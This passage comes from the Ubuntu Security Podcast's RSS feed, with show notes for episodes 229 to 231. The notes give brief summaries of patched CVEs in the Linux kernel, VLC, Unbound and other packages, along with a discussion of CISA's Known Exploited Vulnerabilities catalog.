<li><a href="https://ubuntu.com/security/CVE-2024-26582">CVE-2024-26582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52632">CVE-2023-52632</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52680">CVE-2023-52680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52595">CVE-2023-52595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52626">CVE-2023-52626</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52495">CVE-2023-52495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52584">CVE-2023-52584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52450">CVE-2023-52450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26608">CVE-2024-26608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52609">CVE-2023-52609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52591">CVE-2023-52591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26645">CVE-2024-26645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35838">CVE-2024-35838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52456">CVE-2023-52456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52589">CVE-2023-52589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26585">CVE-2024-26585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52696">CVE-2023-52696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52633">CVE-2023-52633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52462">CVE-2023-52462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52597">CVE-2023-52597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52587">CVE-2023-52587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26584">CVE-2024-26584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26636">CVE-2024-26636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52491">CVE-2023-52491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52493">CVE-2023-52493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26627">CVE-2024-26627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52465">CVE-2023-52465</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52687">CVE-2023-52687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52593">CVE-2023-52593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26595">CVE-2024-26595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26629">CVE-2024-26629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35840">CVE-2024-35840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52666">CVE-2023-52666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26633">CVE-2024-26633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52686">CVE-2023-52686</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52467">CVE-2023-52467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52667">CVE-2023-52667</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52473">CVE-2023-52473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52670">CVE-2023-52670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26649">CVE-2024-26649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52498">CVE-2023-52498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52693">CVE-2023-52693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26583">CVE-2024-26583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52678">CVE-2023-52678</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52675">CVE-2023-52675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52489">CVE-2023-52489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26640">CVE-2024-26640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26618">CVE-2024-26618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52599">CVE-2023-52599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26634">CVE-2024-26634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52608">CVE-2023-52608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26625">CVE-2024-26625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52486">CVE-2023-52486</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26632">CVE-2024-26632</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52669">CVE-2023-52669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52676">CVE-2023-52676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52635">CVE-2023-52635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52664">CVE-2023-52664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35841">CVE-2024-35841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52598">CVE-2023-52598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52458">CVE-2023-52458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26644">CVE-2024-26644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52697">CVE-2023-52697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52617">CVE-2023-52617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26612">CVE-2024-26612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52672">CVE-2023-52672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52490">CVE-2023-52490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35839">CVE-2024-35839</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26610">CVE-2024-26610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26616">CVE-2024-26616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52588">CVE-2023-52588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52623">CVE-2023-52623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26669">CVE-2024-26669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52692">CVE-2023-52692</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26620">CVE-2024-26620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52606">CVE-2023-52606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26592">CVE-2024-26592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52616">CVE-2023-52616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26641">CVE-2024-26641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52622">CVE-2023-52622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52611">CVE-2023-52611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52453">CVE-2023-52453</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52681">CVE-2023-52681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26586">CVE-2024-26586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52472">CVE-2023-52472</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26646">CVE-2024-26646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26670">CVE-2024-26670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26668">CVE-2024-26668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52447">CVE-2023-52447</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52463">CVE-2023-52463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52618">CVE-2023-52618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52691">CVE-2023-52691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26808">CVE-2024-26808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52612">CVE-2023-52612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24860">CVE-2024-24860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23849">CVE-2024-23849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6536">CVE-2023-6536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6535">CVE-2023-6535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6356">CVE-2023-6356</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Of all these CVEs, 6 had a high priority rating
<ul>
<li>many are due to bugs in the async handling of cryto operations in the
in-kernel TLS implementation
<ul>
<li>CVE-2024-26582 and CVE-2024-26584 - both reported by Google kernelCTF program (talked about back in <a href="/episode-228/#usn-6766-2-linux-kernel-vulnerabilities--01-07">[USN-6766-2] Linux kernel vulnerabilities from Episode 228</a>)
<ul>
<li>first is UAF in TLS handling of scattter/gather arrays</li>
<li>second is UAF when crypto requests get backlogged and the underlying
crypto engine can&rsquo;t process them all in time - can then end up having
the async callback invoked twice</li>
</ul>
</li>
<li>CVE-2024-26585
<ul>
<li>very similar - UAF in handling of crypto operations from TLS - thread
which handles the socket could close this before all the operations had
been scheduled</li>
</ul>
</li>
<li>CVE-2024-26583 - similarly, race between async notify event and socket close -&gt; UAF</li>
</ul>
</li>
<li>UAF in BPF and a UAF in netfilter - also reported via Google kernelCTF -
both able to be triggered via an unpriv userns</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussion-of-cisa-kev">Discussion of CISA KEV</h3>
<ul>
<li>US Gov Cybersecurity &amp; Infrastructure Security Agency
<ul>
<li>&ldquo;America&rsquo;s Cyber Defense Agency&rdquo;</li>
<li>National Coordinator for Critical Infrastructure Security and Resilience</li>
</ul>
</li>
<li>Publish various guidance for organisations around topics of cybersecurity
<ul>
<li>for instance, recently published a report <a href="https://www.cisa.gov/resources-tools/resources/exploring-memory-safety-critical-open-source-projects">&ldquo;Exploring Memory Safety in Critical Open Source Projects&rdquo;</a>
<ul>
<li>Joint guidance (FBI, ASD / ACSC &amp; Candadian CSC)</li>
<li>Builds on the previous case for memory safe roadmaps by looking at the
prevalence of memory unsafe languages in various critical open source
projects</li>
</ul>
</li>
</ul>
</li>
<li>Also maintain the KEV - Known Exploitable Vulnerabilities Catalog
<ul>
<li>&ldquo;authoritative source of vulnerabilities that have been exploited in the wild&rdquo;</li>
<li>Mandates for federal civilian agencies in the US to remediate KEV vulns within various timeframes</li>
<li>Also recommend that anyone else monitors this list and immediately addresses these vulns as part of the vuln remediation plan</li>
<li>List of vilns that are causing immediate harm based on observed adversarial activity</li>
<li>Various requirements to be listed in the KEV:
<ul>
<li>CVE ID assigned</li>
<li>Evidence it has been or is being actively exploited
<ul>
<li>reliable evidence that execution of malicious code was performed on a system by an unauthorised actor</li>
<li>also includes both attempted and successful exploitation (e.g. includes honeypots as well as real systems)</li>
</ul>
</li>
<li>Clear remediation guidelines
<ul>
<li>An update is available and should be applied OR</li>
<li>Vulnerable component should be removed from networks etc if it is EOL and cannot be updated</li>
</ul>
</li>
</ul>
</li>
<li>available as CSV or JSON</li>
<li>Currently lists 1126 CVEs including:
<ul>
<li>Accellion File Transfer Appliances</li>
<li>Adobe Reader, Flash Player</li>
<li>Apache HTTP Server, Struts (Solarwinds), Log4j</li>
<li>Huge number of Apple iOS etc (WebKit and more)</li>
<li>Atlassian Confluence</li>
<li>Citrix Gateways</li>
<li>Exim</li>
<li>Fortinet</li>
<li>Gitlab</li>
<li>Google Chromium</li>
<li>ImageMagick</li>
<li>Microsoft Windows and Exchange</li>
<li>Mozilla Firefox</li>
<li>Ivanti Pulse Connect Security</li>
<li>SaltStack</li>
<li>VMWare</li>
<li>WordPress</li>
</ul>
</li>
<li>Oldest CVEs are 2 against Windows from 2002 and 2004</li>
<li>Newest include 26 2024 CVEs - various Chromium, Windows, Android Pixel, Ivanti and more
<ul>
<li>interestingly includes ARM Mali GPU Driver CVE-2024-4610 - this affects
the Bifrost and Valhall drivers - in Ubuntu we only ship the related
Midgard driver back in bionic and focal so not affected by this one</li>
</ul>
</li>
<li>but as you may have noticed, lots that we potentially are affected by
<ul>
<li>Apache HTTP Server, Exim, Firefox, Thunderbird - plus OpenJDK, GNU C
Library, Bash, Roundcube (mentioned earlier but not this particular vuln),
WinRAR (unrar), not to mention a number against the Linux kernel
<ul>
<li>all for Linux kernel are privesc - most against either netfilter or
various other systems like perf, <code>AF_PACKET</code>, tty, ptrace, futex and
others</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>For Ubuntu, not surprisingly, we prioritise these vulnerabilities in our
patching process</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E231.mp3" length="19801297" type="audio/mpeg" /><itunes:duration>1140</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 230
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-230/</link>
          <pubDate>Thu, 20 Jun 2024 12:26:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>d375f992307b9e0e79153d07b3afd34147177050ede5d1db4d83dd25492a5c56ec2f47957a3fe9f4d383410fc00475062b24b05cdc855d8312539b0e4c3f2149</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 230</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we bring you a special edition of the podcast, featuring an interview
  between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential
  Computing. Ranging from a high-level discussion of the need for and the features...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we bring you a special edition of the podcast, featuring an interview
  between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential
  Computing. Ranging from a high-level discussion of the need for and the features
  provided by confidential computing, through to the specifics of how this is
  implemented in Ubuntu and a look at similar future security technologies that
  are on the horizon.
  </itunes:summary>
        <description>  This week we bring you a special edition of the podcast, featuring an interview
  between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential
  Computing. Ranging from a high-level discussion of the need for and the features
  provided by confidential computing, through to the specifics of how this is
  implemented in Ubuntu and a look at similar future security technologies that
  are on the horizon.
  </description>
        <googleplay:description>  This week we bring you a special edition of the podcast, featuring an interview
  between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential
  Computing. Ranging from a high-level discussion of the need for and the features
  provided by confidential computing, through to the specifics of how this is
  implemented in Ubuntu and a look at similar future security technologies that
  are on the horizon.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we bring you a special edition of the podcast, featuring an interview
between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential
Computing. Ranging from a high-level discussion of the need for and the features
provided by confidential computing, through to the specifics of how this is
implemented in Ubuntu and a look at similar future security technologies that
are on the horizon.</p>
<h2 id="confidential-computing-with-ijlal-loutfi-and-karen-horovitz--01-17">Confidential Computing with Ijlal Loutfi and Karen Horovitz (01:17)</h2>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E230.mp3" length="20752959" type="audio/mpeg" /><itunes:duration>1272</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 229
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-229/</link>
          <pubDate>Fri, 31 May 2024 19:46:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>7e4ca4c9cdaf52f180a585bb0f0c463a425c71a29e31d8e17dabbd32d14f4a7a11fca989b18e0d368381ec17721752fc9c4e2861ebb447d5cb25041ac1213394</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 229</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          As the podcast winds down for a break over the next month, this week we talk
  about RSA timing side-channel attacks and the recently announced DNSBomb
  vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  As the podcast winds down for a break over the next month, this week we talk
  about RSA timing side-channel attacks and the recently announced DNSBomb
  vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK,
  amavisd-new, Unbound, Intel Microcode and more.
  </itunes:summary>
        <description>  As the podcast winds down for a break over the next month, this week we talk
  about RSA timing side-channel attacks and the recently announced DNSBomb
  vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK,
  amavisd-new, Unbound, Intel Microcode and more.
  </description>
        <googleplay:description>  As the podcast winds down for a break over the next month, this week we talk
  about RSA timing side-channel attacks and the recently announced DNSBomb
  vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK,
  amavisd-new, Unbound, Intel Microcode and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>As the podcast winds down for a break over the next month, this week we talk
about RSA timing side-channel attacks and the recently announced DNSBomb
vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK,
amavisd-new, Unbound, Intel Microcode and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>152 unique CVEs addressed</p>
<h3 id="usn-6783-1-vlc-vulnerabilities--00-54">[<a href="https://ubuntu.com/security/notices/USN-6783-1">USN-6783-1</a>] VLC vulnerabilities (00:54)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-47360">CVE-2023-47360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47359">CVE-2023-47359</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>integer underflow and a heap buffer overflow -&gt; RCE</li>
</ul>
<h3 id="usn-6663-3-openssl-update--01-40">[<a href="https://ubuntu.com/security/notices/USN-6663-3">USN-6663-3</a>] OpenSSL update (01:40)</h3>
<ul>
<li>Affecting Noble (24.04 LTS)</li>
<li><a href="/episode-220/#usn-6663-1-openssl-update--08-40">[USN-6663-1] OpenSSL update from Episode 220</a> - hardening improvement to return
deterministic random bytes instead of an error when an incorrect padding
length is detected during PKCS#1 v1.5 RSA to avoid this being used for
possible Bleichenbacher timing attacks</li>
</ul>
<h3 id="usn-6673-3-python-cryptography-vulnerability--02-32">[<a href="https://ubuntu.com/security/notices/USN-6673-3">USN-6673-3</a>] python-cryptography vulnerability (02:32)</h3>
<ul>
<li>1 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26130">CVE-2024-26130</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-221/#usn-6673-1-python-cryptography-vulnerabilities--07-30">[USN-6673-1] python-cryptography vulnerabilities from Episode 220</a> -
counterpart to the OpenSSL update mentioned earlier</li>
</ul>
<h3 id="usn-6736-2-klibc-vulnerabilities--02-43">[<a href="https://ubuntu.com/security/notices/USN-6736-2">USN-6736-2</a>] klibc vulnerabilities (02:43)</h3>
<ul>
<li>4 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37434">CVE-2022-37434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25032">CVE-2018-25032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9841">CVE-2016-9841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9840">CVE-2016-9840</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-226/#usn-6736-1-klibc-vulnerabilities--06-33">[USN-6736-1] klibc vulnerabilities from Episode 228</a></li>
</ul>
<h3 id="usn-6784-1-cjson-vulnerabilities--02-58">[<a href="https://ubuntu.com/security/notices/USN-6784-1">USN-6784-1</a>] cJSON vulnerabilities (02:58)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-31755">CVE-2024-31755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50472">CVE-2023-50472</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50471">CVE-2023-50471</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different researchers fuzzing cJSON APIs
<ul>
<li>all different NULL ptr deref - requires particular / &ldquo;incorrect&rdquo; or possible
misuse use of the APIs (like passing in purposefully corrupted values) so
unlikely to be an issue in practice</li>
</ul>
</li>
</ul>
<h3 id="usn-6785-1-gnome-remote-desktop-vulnerability--03-52">[<a href="https://ubuntu.com/security/notices/USN-6785-1">USN-6785-1</a>] GNOME Remote Desktop vulnerability (03:52)</h3>
<ul>
<li>1 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-5148">CVE-2024-5148</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Discovered by a member of the SUSE security team when reviewing g-r-d</li>
<li>Exposed various DBus services that were able to be called by any unprivileged
user which would then return the SSL private key used to encrypt the
connection - so could allow a local user to possibly spy on the sessions of
other users remotely connected to the system</li>
</ul>
<h3 id="usn-6786-1-netatalk-vulnerabilities--04-45">[<a href="https://ubuntu.com/security/notices/USN-6786-1">USN-6786-1</a>] Netatalk vulnerabilities (04:45)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22995">CVE-2022-22995</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Apple file sharing implementation for Linux</li>
<li>If the same path was shared via both AFP and SMB then a remote attacker could
combine various operations through both file-systems (like creating a crafted
symlink, which would then be followed during a second operation where a file
is renamed) to allow them to overwrite arbirary files and hence achieve
arbitrary code execution on the host</li>
</ul>
<h3 id="usn-6788-1-webkitgtk-vulnerabilities--05-48">[<a href="https://ubuntu.com/security/notices/USN-6788-1">USN-6788-1</a>] WebKitGTK vulnerabilities (05:48)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27834">CVE-2024-27834</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible pointer authentication bypass - used on arm64 in particular -
demonstrated at Pwn2Own earlier this year by Manfred Paul - $60k</li>
</ul>
<h3 id="usn-6789-1-libreoffice-vulnerability--06-28">[<a href="https://ubuntu.com/security/notices/USN-6789-1">USN-6789-1</a>] LibreOffice vulnerability (06:28)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-3044">CVE-2024-3044</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Unchecked script execution triggered when clicking on a graphic - allows to
run arbitrary scripts without the usual prompt</li>
</ul>
<h3 id="usn-6790-1-amavisd-new-vulnerability--07-09">[<a href="https://ubuntu.com/security/notices/USN-6790-1">USN-6790-1</a>] amavisd-new vulnerability (07:09)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28054">CVE-2024-28054</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>MTA / AV interface - often used in conjunction with Postfix, not just for AV
but also can be used to do DKIM verification and integration with spamassassin
etc</li>
<li>Misinterpreted MIME message boundaries in emails, allowing email parts to
possibly bypass usual checks</li>
</ul>
<h3 id="usn-6791-1-unbound-vulnerability--07-46">[<a href="https://ubuntu.com/security/notices/USN-6791-1">USN-6791-1</a>] Unbound vulnerability (07:46)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-33655">CVE-2024-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DNSBomb attack announced recently at IEEE S&amp;P - affecting multiple different
DNS implementations including BIND, Unbound, PowerDNS, Knot, DNSMasq and others</li>
<li>Unbound itself was not necessarily vulnerable to such an attack specifically,
but could be used to generate such an attack against others - in particular
Unbound had the highest amplification factor of ~22k times - next highest was
DNSMasq at ~3k times</li>
<li>Fix involves introducing a number of timeout parameters for various operations
